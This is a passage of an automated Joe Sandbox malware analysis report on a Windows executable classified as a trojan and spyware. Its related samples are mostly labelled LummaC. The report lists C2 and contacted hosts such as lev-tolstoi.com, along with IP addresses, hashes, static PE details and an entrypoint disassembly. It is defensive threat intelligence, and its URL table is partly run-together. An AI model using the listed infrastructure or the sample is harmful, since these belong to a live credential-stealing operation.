                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://help.steampowered.com/en/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/market/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/news/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://lev-tolstoi.com/apitly4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://lev-tolstoi.com/apin4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a54KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://recaptcha.net/recaptcha/;4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/discussions/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://store.steampowered.com/stats/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://medal.tv4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://x1.c.lencr.org/04KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://x1.i.lencr.org/04KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1580888
                                                                                                                                                                                                              Start date and time:2024-12-26 12:53:10 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 5m 1s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:5
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:4KDKJjRzm8.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:6be43af1d47558e4993b9c341da5a653.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: 4KDKJjRzm8.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              06:54:05API Interceptor16x Sleep call for process: 4KDKJjRzm8.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              172.67.157.254i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                          Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  23.55.153.106Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              BootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      lev-tolstoi.comC8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      s-part-0035.t-0009.t-msedge.net9InQHaM8hT.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 13.107.246.63
                                                                                                                                                                                                                                                      steamcommunity.comZun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      BootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      AKAMAI-ASN1EUZun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      BootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 23.44.201.30
                                                                                                                                                                                                                                                      CLOUDFLARENETUSP0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.165.185
                                                                                                                                                                                                                                                      b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.113
                                                                                                                                                                                                                                                      C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.165.185
                                                                                                                                                                                                                                                      i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                      • 172.67.150.49
                                                                                                                                                                                                                                                      XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.165.185
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.11.101
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.11.101

                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                      No created / dropped files found

                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.9480945654813215
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      File size:1'875'456 bytes
                                                                                                                                                                                                                                                      MD5:6be43af1d47558e4993b9c341da5a653
                                                                                                                                                                                                                                                      SHA1:0bef6b68199ee1f205326d3289b39102978ec1f5
                                                                                                                                                                                                                                                      SHA256:7e13dd0f50e0ded479413d1061d1d2f73fd2e51639e8b29b22776b4d0ab5368d
                                                                                                                                                                                                                                                      SHA512:28d30e5d6d6c39eebb4508fce49c40bb35b6075a6b523ca8a9f643b1930fc7a49406427317fffccb374314ec59e50d004ddf6ef7082ce532b1858c112ecc05e4
                                                                                                                                                                                                                                                      SSDEEP:24576:14wJZdyAhKE3ZKDyW8UxZ3wiHl1DcFGK1aRV42zbLgpLfuU2mY5A5r909AsaFXLh:KwJWLB8iFxK846QKB5e9OAs8Y
                                                                                                                                                                                                                                                      TLSH:C39533139D07E02FF11EA534110B6FE7C9FDFA254DD8A1B87E814A9CAC1F899405A4BE
                                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................J.....<.....@.................................Y@..m..

                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Entrypoint:0x89e000
                                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      jmp 00007FB3DD1C5FFAh
                                                                                                                                                                                                                                                      haddps xmm3, dqword ptr [eax+eax]
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      jmp 00007FB3DD1C7FF5h
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add al, 00h
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      pop es
                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                      add byte ptr [edx], al
                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                      add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [ebx], cl
                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                      add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
